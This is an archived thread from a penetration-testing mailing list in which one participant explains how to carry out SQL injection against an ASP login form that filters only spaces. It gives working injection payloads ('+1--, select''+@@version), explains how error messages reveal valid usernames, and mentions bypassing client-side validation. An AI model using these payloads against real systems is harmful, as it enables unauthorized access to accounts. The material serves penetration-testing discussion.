Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

RE: How to evade white spaces in a SQL injection

From: "Jeff Bryner" <jeff () jeffbryner com>
Date: Mon, 29 Mar 2004 22:08:43 -0800
Tough to give more without specifics but
you could aim for a query like:

select * from users where useid=useid+1
or
select * from users where useid=''+1

The 2nd one is more likely since they're proably adding the ' character to
whatever you enter.
So you'd enter '+1-- as the username. The first ' ends the ' they add, the
+1 tells sql to add 1 to a character field, which it can't do, the --
comments out the remainder of the query so it doesn't get parsed.  SQL will
then return an error telling you it can't convert some valid username to an
int to complete your request for adding 1 to the username.

For example in sql try the following queries and see the return:
select *
from sysusers
where
user=user+1

select *
from sysusers
where
user=''+1

You'll get a message telling you that it can't convert some username to int.
This will tell you a valid username, then you go for a password..then you're
in!

Jeff.

-----Original Message-----
From: Falcifer [mailto:falcifer2001 () yahoo es]
Sent: Thursday, March 25, 2004 4:35 PM
To: jeff () jeffbryner com
Cc: pen-test () securityfocus com
Subject: Re: How to evade white spaces in a SQL injection


Sorry, but i dont understand it.

Can you explain it a bit more;

Suppous that the original query is:
select * from users where useid=&my_user_without_spaces and
password=&password

where &my_user_without_spaces and &password where the inputs submitted
by the webform but both vars without spaces;

Thanks

El jue, 25-03-2004 a las 18:13, Jeff Bryner escribió:

--- Falcifer <falcifer2001 () yahoo es> wrote:

Hi,

I've one aplication coded on asp with a login form and the only
character that it validates its the withe space.

Can i perform a sql injection on it? how?


SQL is nice enough to do some automatic parsing for you..so

select''+@@version

will work.  Of course if the validation is client side, just bypass it.



=====
Jeff
-----------------------
You... you can't dump me! I'm using your name for all my passwords! What

exactly am I supposed to do about that!?


- Justin Simoni

__________________________________
Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
http://taxes.yahoo.com/filing.html



---------------------------------------------------------------------------
You're a pen tester, but is google.com still your R&D team?
Now you can get trustworthy commercial-grade exploits and the latest
techniques from a world-class research group.
www.coresecurity.com/promos/sf_ept1
----------------------------------------------------------------------------


---------------------------------------------------------------------------
You're a pen tester, but is google.com still your R&D team?
Now you can get trustworthy commercial-grade exploits and the latest
techniques from a world-class research group.
www.coresecurity.com/promos/sf_ept1
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: